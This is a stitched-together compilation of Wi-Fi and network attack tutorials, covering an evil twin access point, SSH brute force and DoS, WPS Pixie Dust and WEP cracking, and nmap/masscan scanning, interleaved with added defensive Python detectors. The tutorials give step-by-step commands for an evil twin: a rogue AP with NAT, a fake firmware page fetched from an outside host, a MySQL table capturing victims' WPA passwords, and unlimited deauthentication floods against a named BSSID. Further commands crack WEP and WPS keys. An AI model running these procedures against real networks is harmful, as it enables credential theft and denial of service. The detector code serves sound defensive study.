EVIL TWIN ATTACK

An evil twin, in network security, is a fake or rogue wireless access point (WAP) that appears to be a genuine hotspot offered by a legitimate provider. In an evil twin attack, an eavesdropper or hacker fraudulently creates this rogue hotspot to collect the personal data of unsuspecting users. Sensitive data can be stolen by spying on the connection or by using a phishing technique. For example, a hacker using an evil twin exploit may be positioned near an authentic Wi-Fi access point, discover its service set identifier (SSID) and frequency, and then transmit a radio signal on exactly the same frequency with the same SSID. To end users, the rogue evil twin appears as their legitimate hotspot with the same name.

Installing required tools:
Open a terminal and type
#apt-get install dnsmasq -y
to install the latest version of the DHCP server in Kali Linux.

Configure tools:
Create a configuration file for dnsmasq using the nano editor (the dnsmasq configuration file). Save the dnsmasq.conf file and exit.

Putting the wireless adapter into monitor mode:
#airmon-ng start wlan0
Now our card is in monitor mode without any issues with Network Manager. We can simply start monitoring the air with the command
#airodump-ng wlan0mon
Copy our target's details for further reference.

Display all wireless adapters connected to Kali Linux, then set the tx-power of the wireless adapter wlan0mon to the maximum of 1000 mW (30 dBm). tx-power stands for transmission power. By default it is set to 20 dBm (dBm: decibels relative to one milliwatt), or 100 mW. The power in mW increases tenfold with every 10 dBm (P[mW] = 10^(dBm/10), so 20 dBm is 100 mW and 30 dBm is 1000 mW; see the dBm to mW table). If your country was set to US during installation, then your card should operate at 30 dBm (1000 mW).

Start Evil Twin Attack
Begin the Evil Twin attack using airbase-ng. By default, airbase-ng creates a tap interface (at0) as the wired interface for bridging/routing the network traffic via the rogue access point. You can see it using the ifconfig at0 command.
Allocate IP and subnet mask
For at0 to allocate IP addresses, we first need to assign an IP range to it. The Class A IP address 10.0.0.1 matches the dhcp-option parameter of the dnsmasq.conf file, which means at0 will act as the default gateway under dnsmasq.

Now we will use our default Internet-facing interface, eth0, to route all the traffic from the client through it. In other words, we allow the victim to access the Internet while allowing ourselves (the attacker) to sniff that traffic. For that, we will use the iptables utility to set a firewall rule to route all the traffic through at0 exclusively. You will get similar output if using a VM.

Enable NAT by setting firewall rules in iptables
Make sure you enter the correct interface for --out-interface. eth0 here is the upstream interface where we want to send out packets coming from the at0 interface (rogue AP). The rest is fine. After entering the above command, if you are willing to provide Internet access to the victim, just enable routing using the command below.

Enable IP forwarding
Entering "1" in the ip_forward file tells the system to enable the rules defined in iptables and start forwarding traffic (if any). 0 stands for disabling. The rules will remain defined until the next reboot.

Start DHCP listener
#dnsmasq -C ~/Desktop/dnsmasq.conf -d

Start services
Download the rogue AP configuration files: get the files from cdn.rootsh3ll.com for the fake AP to display a fake administrator page asking the victim to enter the password.

Unzipping Rogue_AP.zip
This command will extract the contents of Rogue_AP.zip and copy them to Apache's HTML directory, so that when the victim opens the browser s/he will automatically be redirected to the default index.html webpage.

Database configuration
Log in as the root user:
#mysql -u root -p
Create a new user fakeap with the password fakeap.
Since version 5.7 you cannot execute MySQL queries from PHP as the root user, so:
mysql> create user fakeap@localhost identified by 'fakeap';
Now create the database and table as defined in dbconnect.php:
mysql> create database rogue_AP;
mysql> use rogue_AP;
mysql> create table wpa_keys(password1 varchar(32), password2 varchar(32));
Grant fakeap all permissions on the rogue_AP database:
mysql> grant all privileges on rogue_AP.* to 'fakeap'@'localhost';
Exit, then log in using the new user:
#mysql -u fakeap -p
Select the rogue_AP database:
mysql> use rogue_AP;
Insert a test value in the table:
mysql> insert into wpa_keys(password1, password2) values ('testpass', 'testpass');
mysql> select * from wpa_keys;
Note that both values are the same here, which means the password and the confirmation password should match.

The Evil Twin attack is now ready; however, we need to wait for the client to connect and see the credentials come in. In some cases, your client might already be connected to the original AP. You need to disconnect the client forcefully using the aireplay-ng utility. This is called a deauthentication attack: the attacker sends carefully crafted packets carrying the BSSID of the access point, telling every client to de-authenticate. Connected clients honor the command and disconnect themselves.

De-authentication:
#aireplay-ng --deauth 0 -a FC:DD:55:08:4F:C2 wlan0mon
--deauth 0 = unlimited deauthentication requests
-a = BSSID

As soon as a client connects to our fake AP we will see activity in the airbase-ng terminal window, and likewise in the DHCP listener terminal window.

DNS spoofing
This spoofs all web URLs the victim browses. The victim can now access the Internet, and you can sniff the client traffic at this stage. When the victim tries to access any website (google.com in this case), s/he will see a page telling the victim to enter the password to download and upgrade the firmware.
Then the victim types the password and submits it. The credential is saved in our (the attacker's) database, and the victim is shown an "upgrading" page. After that the victim can access the Internet, so the victim has no reason to suspect the attack. Just go to the previously used command in the MySQL terminal window and see whether a new entry is there or not. After simulating, I checked the MySQL DB and here […]
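A defender-side counterpart to the two signals the article relies on, added here as an example (it is not code from the article or from any of the tools it names): a second BSSID advertising a known SSID, here also downgrading from an encrypted network to an open one, and a burst of deauthentication frames carrying the real access point's BSSID. The script parses raw 802.11 management frames (frame control, addresses, beacon capability field and SSID element, deauth reason code) and reports both conditions. The authorized inventory, the threshold of 5 deauths, the sample frames and every MAC address except FC:DD:55:08:4F:C2 (the BSSID the article uses) are constructed for the demo, and the frame builders exist only to produce offline test input. On the mitigation side, 802.11w Protected Management Frames (mandatory in WPA3) makes spoofed deauthentication frames fail verification at the client, which removes the forced-disconnect step entirely.

```python
import struct
from collections import Counter

# Constructed inventory of authorized BSSIDs per SSID. The BSSID below is the one the article uses;
# every other address in this file is made up for the demo.
AUTHORIZED = {"CorpWiFi": {"fc:dd:55:08:4f:c2"}}
DEAUTH_THRESHOLD = 5   # assumption: more deauths than this from one BSSID in a capture window is a flood

def mac_bytes(mac):
    return bytes.fromhex(mac.replace(":", ""))

def mac_str(b):
    return ":".join(f"{x:02x}" for x in b)

# --- frame builders: used only to construct offline sample input --------------------------------
def _mgmt_header(subtype, addr1, addr2, addr3):
    frame_control = subtype << 4                     # type 0 (management) in bits 2-3, subtype in bits 4-7
    return (struct.pack("<HH", frame_control, 0)     # frame control, duration
            + mac_bytes(addr1) + mac_bytes(addr2) + mac_bytes(addr3)
            + struct.pack("<H", 0))                  # sequence control

def build_beacon(bssid, ssid, privacy):
    capability = 0x0001 | (0x0010 if privacy else 0)   # ESS bit; Privacy bit = encryption enabled
    body = struct.pack("<QHH", 0, 100, capability) + bytes([0, len(ssid)]) + ssid.encode()
    return _mgmt_header(8, "ff:ff:ff:ff:ff:ff", bssid, bssid) + body

def build_deauth(bssid, client):
    return _mgmt_header(12, client, bssid, bssid) + struct.pack("<H", 7)   # reason code 7

# --- parser and detector -----------------------------------------------------------------------
def parse_frame(raw):
    frame_control, = struct.unpack_from("<H", raw, 0)
    frame = {"type": (frame_control >> 2) & 0x3, "subtype": (frame_control >> 4) & 0xF,
             "dst": mac_str(raw[4:10]), "src": mac_str(raw[10:16]), "bssid": mac_str(raw[16:22])}
    if frame["type"] == 0 and frame["subtype"] == 8:           # beacon: capability field, then IEs
        capability, = struct.unpack_from("<H", raw, 34)        # 24-byte header + timestamp(8) + interval(2)
        frame["privacy"] = bool(capability & 0x0010)
        pos = 36
        while pos + 2 <= len(raw):
            eid, elen = raw[pos], raw[pos + 1]
            if eid == 0:                                       # SSID information element
                frame["ssid"] = raw[pos + 2:pos + 2 + elen].decode(errors="replace")
                break
            pos += 2 + elen
    elif frame["type"] == 0 and frame["subtype"] == 12:        # deauthentication
        frame["reason"], = struct.unpack_from("<H", raw, 24)
    return frame

def analyze(frames, authorized=AUTHORIZED, deauth_threshold=DEAUTH_THRESHOLD):
    findings, seen, deauths = [], set(), Counter()
    for f in frames:
        if f["type"] != 0:
            continue
        if f["subtype"] == 8 and "ssid" in f:
            key = (f["ssid"], f["bssid"])
            if key in seen:
                continue
            seen.add(key)
            known = authorized.get(f["ssid"])
            if known is not None and f["bssid"] not in known:   # known SSID from an unknown BSSID
                findings.append(("evil-twin-candidate", f["ssid"], f["bssid"],
                                 "encrypted" if f["privacy"] else "open"))
        elif f["subtype"] == 12:
            deauths[f["bssid"]] += 1
    for bssid, n in deauths.items():
        if n > deauth_threshold:
            findings.append(("deauth-flood", bssid, n))
    return findings

# Constructed capture: real AP beacons, an open twin with the same SSID, a deauth burst, an unrelated AP.
SAMPLE_FRAMES = (
    [build_beacon("fc:dd:55:08:4f:c2", "CorpWiFi", privacy=True)] * 3
    + [build_beacon("00:11:22:33:44:55", "CorpWiFi", privacy=False)] * 3
    + [build_deauth("fc:dd:55:08:4f:c2", "aa:bb:cc:dd:ee:01")] * 20
    + [build_beacon("66:77:88:99:aa:bb", "GuestNet", privacy=False)]
)

def run_sample():
    return analyze(parse_frame(raw) for raw in SAMPLE_FRAMES)

if __name__ == "__main__":
    for finding in run_sample():
        print(finding)
```

The inventory check is the part that needs care in a real deployment: neighbouring networks that legitimately share an SSID name are not rogue, so the match is on the SSIDs you own, and a new BSSID for one of those is the alert condition whether or not the twin keeps the original security settings.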
SSH Brute Force & DoS Attack With Snort & Analyzing in Wireshark

This article is about attacking a system, monitoring the attack, and analysing the generated logs. The scenario has two machines: one is the victim's machine and the other is the attacker's machine. A firewall sits between the two, installed on the victim's machine. The attacker attacks the victim's machine while, at the same time, the firewall on the victim's machine monitors the live attack; the logs are then analysed. In this scenario the Kali Linux operating system is installed on the victim's machine and the Cyborg Hawk operating system on the attacker's machine. Snort (the intrusion detection system the article uses as its firewall) is also installed on the victim's machine. The attacker then performs two attacks on the victim's system: an SSH attack and a DoS attack. In the SSH attack the attacker gains access to the victim's machine; in the DoS attack the attacker crashes the victim's machine.

Victim machine
Attacker machine

What is an SSH attack?
SSH attacks are brute-force attacks: repeated attempts to authenticate to the remote SSH server. A dictionary attack is the best example of a brute-force attack. Another type of brute-force attack tries combinations of letters and numbers, as well as commonly used passwords. A brute-force attack is a trial-and-error iteration used to obtain a user's password or PIN (Personal Identification Number). Many automated tools are available for brute-force attacks, such as:
1. Hydra
2. Cain & Abel
3. John the Ripper

Port scanning
Port scanning using Zenmap:
Port scanning using Nmap:
Brute-force dictionary for the attack:
Brute force using Hydra:

Gain the victim's remote access
Gain the victim's remote access using SSH:
Output
Kill Snort after gaining access:
Snort after killing the victim's machine:

Logs
Port scanning logs
Monitoring:
Analyse:
Brute-force attack logs
Monitoring:
Analyse:
Gaining access logs
Monitoring:
Analyse:

Introduction to DoS attack
A DoS (Denial of Service) attack is an attack used to make a machine or network inaccessible or to shut it down. In a DoS attack the attacker floods the target with traffic, or sends it information that causes a crash. The main impact of a DoS attack is to stop the user from accessing computer or network resources.
Bandwidth attacks: a bandwidth attack overflows the network with heavy traffic, using up the existing network resources.
Connectivity attacks: a connectivity attack overflows the system with so many incoming connection requests that they consume all of the operating system's resources, making it inaccessible and non-responsive to user requests.

DoS using hping3
Output
After DoS, the victim's OS:
After DoS, the victim's drive:
Kcore file:
Snort logs generated after the DoS, and log size:
Logs
Monitoring:
Analyse:
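The log analysis the article leaves to screenshots, worked as an added example (not the article's own code or output): a detector for the two attack patterns it describes. The first function walks sshd lines from a syslog-style auth log, keeps a sliding window of failed logins per source address, flags a source once it crosses a threshold, and records the username if a later successful login comes from that same source, which is the "attacker gained access" outcome the article reaches with Hydra. The second function applies the same sliding window to bare SYN packets per source, the hping3-style connectivity flood. The log lines, packet records, addresses, thresholds and the assumed year for the year-less syslog timestamps are all constructed for the demo.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

FAILED_RE = re.compile(r"Failed password for (?:invalid user )?(\S+) from (\S+) port \d+")
ACCEPTED_RE = re.compile(r"Accepted (?:password|publickey) for (\S+) from (\S+) port \d+")
TS_RE = re.compile(r"^(\w{3} +\d+ \d\d:\d\d:\d\d)")

def parse_ts(line, year=2024):
    """syslog timestamps carry no year, so one is assumed (demo assumption)."""
    m = TS_RE.match(line)
    return datetime.strptime(f"{year} {m.group(1)}", "%Y %b %d %H:%M:%S") if m else None

def detect_ssh_bruteforce(lines, threshold=5, window_s=60):
    """Return {src_ip: report} for sources with >= threshold failed logins inside window_s seconds.
    A later successful login from a flagged source is recorded under 'compromised' (the account name)."""
    recent = defaultdict(deque)   # src_ip -> timestamps of recent failures
    tried = defaultdict(set)      # src_ip -> usernames attempted
    reports = {}
    for line in lines:
        ts = parse_ts(line)
        if ts is None:
            continue
        m = FAILED_RE.search(line)
        if m:
            user, ip = m.groups()
            tried[ip].add(user)
            q = recent[ip]
            q.append(ts)
            while (ts - q[0]).total_seconds() > window_s:   # drop failures older than the window
                q.popleft()
            if len(q) >= threshold:
                report = reports.setdefault(ip, {"failures": 0, "users": tried[ip], "compromised": None})
                report["failures"] = max(report["failures"], len(q))
            continue
        m = ACCEPTED_RE.search(line)
        if m and m.group(2) in reports:                      # success after a flagged burst
            reports[m.group(2)]["compromised"] = m.group(1)
    return reports

def detect_syn_flood(packets, threshold=100, window_s=1.0):
    """packets: iterable of (t_seconds, src_ip, tcp_flags). Counts bare SYNs ("S") per source in a
    sliding window and returns {src_ip: peak count} for sources that exceed threshold."""
    windows, peaks = defaultdict(deque), {}
    for t, src, flags in packets:
        if flags != "S":
            continue
        q = windows[src]
        q.append(t)
        while t - q[0] > window_s:
            q.popleft()
        if len(q) > threshold:
            peaks[src] = max(peaks.get(src, 0), len(q))
    return peaks

# Constructed sample data (not from the article): 10.0.0.99 plays the attacker, 10.0.0.5 a normal user.
SAMPLE_AUTH_LOG = """\
Mar 3 10:15:01 victim sshd[2101]: Failed password for invalid user admin from 10.0.0.99 port 51001 ssh2
Mar 3 10:15:02 victim sshd[2102]: Failed password for invalid user admin from 10.0.0.99 port 51002 ssh2
Mar 3 10:15:02 victim sshd[2103]: Failed password for root from 10.0.0.99 port 51003 ssh2
Mar 3 10:15:03 victim sshd[2104]: Failed password for root from 10.0.0.99 port 51004 ssh2
Mar 3 10:15:03 victim sshd[2105]: Failed password for root from 10.0.0.99 port 51005 ssh2
Mar 3 10:15:04 victim sshd[2106]: Failed password for root from 10.0.0.99 port 51006 ssh2
Mar 3 10:15:05 victim sshd[2107]: Accepted password for root from 10.0.0.99 port 51007 ssh2
Mar 3 10:20:00 victim sshd[2150]: Failed password for alice from 10.0.0.5 port 40001 ssh2
Mar 3 10:20:04 victim sshd[2151]: Accepted password for alice from 10.0.0.5 port 40002 ssh2
""".splitlines()

SAMPLE_PACKETS = ([(i * 0.005, "10.0.0.99", "S") for i in range(150)]          # 150 SYNs in 0.75 s
                  + [(0.10, "10.0.0.5", "S"), (0.20, "10.0.0.5", "SA"), (0.30, "10.0.0.5", "A")])

if __name__ == "__main__":
    print(detect_ssh_bruteforce(SAMPLE_AUTH_LOG))
    print(detect_syn_flood(SAMPLE_PACKETS))
```

The single failed login from alice followed by a success is the everyday typo case and produces nothing; the burst from 10.0.0.99 is reported with the usernames it cycled through, and the subsequent accepted login turns the alert from "attempted" into "succeeded", which is the distinction an incident responder needs first.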
Best Way to Crack WPS Pin | Cybogram

Wi-Fi Protected Setup
WPS is a network security standard created for a secure wireless home network. WPS (Wi-Fi Protected Setup) was introduced by the Wi-Fi Alliance in 2006. The main purpose of this protocol is to allow home users who know little about wireless security, and may be intimidated by all the available security options, to set up WPA (Wi-Fi Protected Access), as well as making it easy to add new devices to an existing network without entering long passphrases. Before the standard, several competing solutions were developed by different vendors to address the same need.

In December 2011, a major security flaw was revealed. It affects wireless routers with the WPS PIN feature, which most recent models have enabled by default. This flaw allows a remote attacker to recover the WPS PIN within a few minutes to hours with a brute-force attack and, with the WPS PIN, the WPA/WPA2 key. Users are urged to turn off the WPS PIN feature, although this may not be possible on some router models.

Why Wi-Fi Protected Setup is insecure
The components of WPS:

PIN: The router has an eight-digit PIN that you must enter on your devices to connect. The router does not check the entire 8-digit PIN at once: WPS checks the first four digits and the last four digits separately, not at the same time. This makes a brute-force attack very easy to mount, because there are only 11,000 possible combinations; the first four digits can be brute-forced easily and the attacker can then go for the next four. Many consumer routers don't time out after a wrong WPS PIN is provided, allowing attackers to guess over and over again. A WPS PIN can be brute-forced in a couple of days. Software such as "Reaver" is used for cracking a WPS PIN.

Push-Button-Connect: Rather than entering a PIN or passphrase, you simply push a physical button on the router after trying to connect. (The button may be a software button on a setup screen.) This is safer, as devices can only connect with this method for a few minutes after the button is pressed or after one device connects. It is not active and available to exploit all the time, as a WPS PIN is. Push-button-connect seems largely secure, with the sole vulnerability being that anyone with physical access to the router could push the button and connect, even if they didn't know the Wi-Fi passphrase.

Tool used for cracking the WPS PIN
Installation:
#git clone https://github.com/v1s1t0r1sh3r3/airgeddon.git
#cd airgeddon
~/airgeddon/# bash airgeddon.sh

Select the interface to work with. Select the second option, "Put interface in monitor mode", to put the adapter in monitor mode. Select the option for the attack: then select "8. WPS attacks menu". Select which attack to run on WPS (the router): after the WPS attacks menu opens, we have to select "7. Option bully pixie attack" to attack the target.

Enter BSSID, channel, timeout value and path: we have already selected the interface and put it in monitor mode. Then select the target by typing the target BSSID. Then set the channel and type the timeout (value in seconds). If we want to save the password to a text file at a particular path, type that path; otherwise it is stored at the default path. Then press Enter.

WPS bully pixie dust attack started: the process is running to crack the PIN. A Pixie-Dust attack works by brute-forcing the key for a protocol called WPS. WPS is an easy way to access a router, and it is just as easy for an attacker. A Wi-Fi Protected Setup PIN is an 8-digit PSK, or Pre-Shared Key; each key holds half the PIN. To understand how the Pixie Dust attack works, you will need to understand how the requests to the access point work:

We successfully cracked the WPS PIN. There's the password! This type of attack will not work on all routers, but it is more effective than a brute-force attack. Pixie Dust: maximum 30 minutes vs. brute force: minutes to days.
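The arithmetic behind the "only 11,000 combinations" figure above, added here as a worked note that is not part of the original article. An 8-digit PIN looks like $10^{8}$ possibilities, but the eighth digit is a checksum of the first seven, and because the registrar acknowledges the first half of the PIN separately from the second, each half can be searched on its own:

$$
\underbrace{10^{4}}_{\text{first half}} \;+\; \underbrace{10^{3}}_{\text{second half, checksum digit derived}} \;=\; 11\,000 \;\ll\; 10^{7} \text{ valid PINs} \;<\; 10^{8} \text{ raw digit strings}
$$

With no lockout after wrong guesses, a search of that size is a matter of hours, which is why the guidance is to disable the PIN method rather than rely on rate limiting.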
What is Wireless?

The word wireless is defined in the dictionary as "having no wires". In networking terminology, wireless is the term used to describe any computer network where there is no physical wired connection between sender and receiver; instead the network is connected by radio waves and/or microwaves to maintain communications. Wireless networking utilizes specific equipment such as NICs, APs and routers in place of wires (copper or optical fibre) for connectivity.

Wireless technology started in the early 20th century with radiotelegraphy using Morse code. When modulation was introduced, it became possible to transmit voices, music and other sounds wirelessly. This medium then came to be known as radio. Due to the demand for data communication, a larger portion of the spectrum of wireless signals became a requirement and the term wireless gained widespread use. When the word wireless is mentioned, people most often mean wireless computer networking, as in Wi-Fi, or cellular telephony, which is the backbone of personal communications.

Common everyday wireless technologies include:
802.11 Wi-Fi: wireless networking technology for personal computers
Bluetooth: technology for interconnecting small devices
Global System for Mobile Communication (GSM): de facto mobile phone standard in many countries
Two-Way Radio: radio communications, as in amateur and citizen band radio services, as well as business and military communications

What is Penetration Testing?

A penetration test, also known as a pen test, is a simulated cyberattack against your computer system to check for exploitable vulnerabilities. In the context of web application security, penetration testing is commonly used to augment a web application firewall.
Pen testing can involve the attempted breaching of any number of application systems (e.g., application programming interfaces (APIs), frontend/backend servers) to uncover vulnerabilities, such as unsanitized inputs that are susceptible to code injection attacks. Insights provided by the penetration test can be used to fine-tune your WAF security policies and patch detected vulnerabilities.

Phases of Penetration Testing
Penetration Testing Phases

What is Wireless Penetration Testing?

Wireless penetration testing is the process of actively examining the information security measures placed in wireless networks and analysing their weaknesses, technical flaws, and critical wireless vulnerabilities. The most important countermeasures we should focus on are threat assessment, data theft detection, security control auditing, risk prevention and detection, information system management and infrastructure upgrades, and a detailed report should be prepared.

WEP (Wired Equivalent Privacy)

Wired Equivalent Privacy (WEP) is a security protocol, specified in the IEEE Wireless Fidelity (Wi-Fi) standard 802.11b, that is designed to provide a wireless local area network (WLAN) with a level of security and privacy comparable to what is usually expected of a wired LAN. A wired local area network (LAN) is generally protected by physical security mechanisms (controlled access to a building, for example) that are effective for a controlled physical environment but may be ineffective for WLANs, because radio waves are not necessarily bound by the walls containing the network. WEP seeks to establish similar protection to that offered by the wired network's physical security measures by encrypting data transmitted over the WLAN.
Data encryption protects the vulnerable wireless link between clients and access points; once this measure has been taken, other typical LAN security mechanisms such as password protection, end-to-end encryption, virtual private networks (VPNs), and authentication can be put in place to ensure privacy.

Step 1: Check the wireless adapter connected to the system
Open a terminal, type the following command and hit Enter, as shown in the figure below.
#iwconfig

Step 2: Setting up the adapter in monitor mode
Open a terminal, type the following command and hit Enter, as shown in the figure below.
#airmon-ng start wlan0

Step 3: Searching for access points around you
Open a terminal, type the following command and hit Enter, as shown in the figure below.
#airodump-ng wlan0mon

Step 4: Capturing packets of the selected access point
Now let's capture packets of the Wi-Fi that we want to hack. Type the following command to do so.
#airodump-ng --bssid 7C:8B:CA:46:B2:F9 -c 4 -w my1 wlan0mon
After that, the my1-01.cap file is stored.

Step 5: Deauth packet requests for the handshake
Open a terminal, type the following command and hit Enter, as shown in the figure below.
#aireplay-ng -0 0 -a 7C:8B:CA:46:B2:F9 wlan0mon
After 2 or 3 minutes, close it so that the victim re-authenticates.

Step 6: Cracking the password using aircrack-ng
Open a terminal, type the following command and hit Enter, as shown in the figure below.
#aircrack-ng '/root/Desktop/my1-01.cap'
We have successfully cracked the password.

WPA (Wi-Fi Protected Access)

Wi-Fi Protected Access (WPA), Wi-Fi Protected Access II (WPA2), and Wi-Fi Protected Access 3 (WPA3) are three security protocols and security certification programs developed by the Wi-Fi Alliance to secure wireless computer networks.
The Alliance defined these in response to serious weaknesses researchers had found in the previous system, Wired Equivalent Privacy (WEP).

Difference between WPA, WPA2 and WPA3

WPA
The Wi-Fi Alliance intended WPA as an intermediate measure to take the place of WEP pending the availability of the full IEEE 802.11i standard. WPA could be implemented through firmware upgrades on wireless network interface cards designed for WEP that began shipping as far back as 1999. However, since the changes required in the wireless access points (APs) were more extensive than those needed on the network cards, most pre-2003 APs could not be upgraded to support WPA. The WPA protocol implements much of the IEEE 802.11i standard. Specifically, the Temporal Key Integrity Protocol (TKIP) was adopted for WPA. WEP used a 64-bit or 128-bit encryption key that must be manually entered on wireless access points and devices and does not change. TKIP employs a per-packet key, meaning that it dynamically generates a new 128-bit key for each packet and thus prevents the types of attacks that compromised WEP.

WPA2
WPA2 replaced WPA. WPA2, which requires testing and certification by the Wi-Fi Alliance, implements the mandatory elements of IEEE 802.11i. In particular, it includes mandatory support for CCMP, an AES-based […]
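Why a key that "does not change" is the problem, and what a per-packet key buys, shown as an added example in Python (not from the article or from any Wi-Fi implementation). RC4 is implemented directly because it is the stream cipher under both WEP and TKIP; the WEP-style path prefixes a 24-bit IV to the fixed key, and the per-packet path mixes the base key with a packet sequence number through SHA-256, which is a simplified stand-in for TKIP's key-mixing function and an assumption of this demo, not the real algorithm. The key, IV and two packets are constructed. With one key and a repeated IV (unavoidable with only 2^24 IV values), the two ciphertexts XOR to the XOR of the plaintexts, so one known packet exposes the other; with per-packet keys the same operation yields nothing useful.

```python
import hashlib

def rc4_keystream(key: bytes, n: int) -> bytes:
    """Generate n bytes of RC4 keystream (key scheduling, then the output generator)."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)

def xor_bytes(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

def encrypt_static_key(key: bytes, iv: bytes, packet: bytes) -> bytes:
    """WEP-style: RC4 keyed with IV || fixed key. A repeated IV means a repeated keystream."""
    return xor_bytes(rc4_keystream(iv + key, len(packet)), packet)

def encrypt_per_packet_key(key: bytes, seq: int, packet: bytes) -> bytes:
    """TKIP-style idea: derive a fresh RC4 key per packet from the base key and the sequence number.
    SHA-256 here is a simplified stand-in for TKIP's key-mixing function (demo assumption)."""
    per_packet_key = hashlib.sha256(key + seq.to_bytes(6, "big")).digest()[:16]
    return xor_bytes(rc4_keystream(per_packet_key, len(packet)), packet)

def recover_with_known_plaintext(c1: bytes, c2: bytes, p1: bytes) -> bytes:
    """If c1 and c2 share a keystream K: c1 ^ c2 = (p1 ^ K) ^ (p2 ^ K) = p1 ^ p2, so p2 = c1 ^ c2 ^ p1."""
    return xor_bytes(xor_bytes(c1, c2), p1)

# Constructed demo data: a 104-bit key (the "128-bit WEP" size once the 24-bit IV is counted), one IV,
# and two equal-length packets.
KEY = bytes.fromhex("0f1e2d3c4b5a69788796a5b4c3")
IV = b"\x01\x02\x03"
P1 = b"GET /index.html HTTP/1.1\r\n"
P2 = b"POST /login.php HTTP/1.1\r\n"

def demo():
    """Returns (leaks_with_static_key, leaks_with_per_packet_key)."""
    c1 = encrypt_static_key(KEY, IV, P1)
    c2 = encrypt_static_key(KEY, IV, P2)          # same key, same IV: same keystream
    leaked = recover_with_known_plaintext(c1, c2, P1)
    d1 = encrypt_per_packet_key(KEY, 1, P1)
    d2 = encrypt_per_packet_key(KEY, 2, P2)       # different derived keys: unrelated keystreams
    not_leaked = recover_with_known_plaintext(d1, d2, P1)
    return leaked == P2, not_leaked == P2

if __name__ == "__main__":
    print(demo())
```

This is also why TKIP was only a stopgap: it still runs RC4 underneath and fixes the key-reuse symptom rather than the cipher, which is what the CCMP (AES) requirement in WPA2 addresses.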
Nmap

Nmap is a very powerful tool for discovering information about machines on a network or on the Internet. Nmap probes a system with packets to detect everything about the running services and open ports, as well as the operating system and software versions.

Masscan

MASSCAN is a tool similar to Nmap; it is Nmap on massive overdrive. MASSCAN can scan the entire Internet in 6 minutes and produce reports. It is a top network scanner, one could even say a world-class network scanner. masscan uses a custom TCP/IP stack and can conflict with other tools. Installation of MASSCAN is easy and quick. The MASSCAN repo is found here: https://github.com/robertdavidgraham/masscan

OS 1: IP = 192.168.118.131
OS 2: IP = 192.168.118.133
Start the ssh service on OS 2.
Start the apache service on OS 2.
Using nmap, scan OS 2 from OS 1.
Using masscan, scan OS 2 from OS 1.
Scan google.com using nmap on OS 1.
Scan google.com using masscan on OS 1.
ping google.com. See the IP 18.104.22.168 and scan that IP from OS 1 using nmap.
Using masscan, scan the IP address 22.214.171.124 from OS 1.
Now using masscan, scan all available hosts in that network, and do the same with nmap.

Conclusion
For a single IP address nmap gives good results, but when we scan a network, masscan performs better than nmap.
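What the scans above look like from the scanned host's side, as an added example (not code from the article, nmap or masscan): a detector over SYN flow records that groups by source/destination pair, slides a time window, and flags a pair once its bare SYNs touch a threshold of distinct destination ports. It also reports the peak SYN rate, which in practice is what separates a masscan-style sweep from a slower nmap default scan and from a normal client opening a few connections. The flow records, the 192.168.118.10 client, the thresholds and the window are constructed; the two other 192.168.118.x addresses are the OS 1 and OS 2 addresses the article uses.

```python
from collections import Counter, defaultdict, deque

# Constructed flow records (not from the article): (t_ms, src_ip, dst_ip, dst_port, tcp_flags).
# 192.168.118.131 -> .133 is the article's OS 1 scanning OS 2; .10 is a made-up normal client.
SAMPLE_FLOWS = (
    [(i * 20, "192.168.118.131", "192.168.118.133", port, "S")      # 1000 ports, one every 20 ms
     for i, port in enumerate(range(1, 1001))]
    + [(5000, "192.168.118.10", "192.168.118.133", 22, "S"),
       (5100, "192.168.118.10", "192.168.118.133", 80, "S"),
       (5200, "192.168.118.10", "192.168.118.133", 443, "S")]
)

def detect_port_scans(flows, min_ports=20, window_ms=10_000):
    """Flag (src, dst) pairs whose bare SYNs reach at least min_ports distinct destination ports
    within window_ms. Returns {(src, dst): {"ports": peak distinct ports in a window,
    "rate_pps": peak SYNs per second over that window}}."""
    by_pair = defaultdict(list)
    for t, src, dst, port, flags in flows:
        if flags == "S":                                   # SYN without ACK: a connection attempt
            by_pair[(src, dst)].append((t, port))
    findings = {}
    for pair, events in by_pair.items():
        events.sort()
        window, port_count = deque(), Counter()
        for t, port in events:
            window.append((t, port))
            port_count[port] += 1
            while t - window[0][0] > window_ms:            # expire events older than the window
                _, old = window.popleft()
                port_count[old] -= 1
                if port_count[old] == 0:
                    del port_count[old]
            if len(port_count) >= min_ports:
                span_ms = max(t - window[0][0], 1)
                rate = len(window) * 1000 / span_ms
                prev = findings.get(pair, {"ports": 0, "rate_pps": 0.0})
                findings[pair] = {"ports": max(prev["ports"], len(port_count)),
                                  "rate_pps": max(prev["rate_pps"], round(rate, 1))}
    return findings

if __name__ == "__main__":
    for pair, info in detect_port_scans(SAMPLE_FLOWS).items():
        print(pair, info)
```

The distinct-port count rather than the raw SYN count is what keeps a busy but legitimate client (many connections to one or two ports) out of the alert; the client in the sample hits three ports and is never reported.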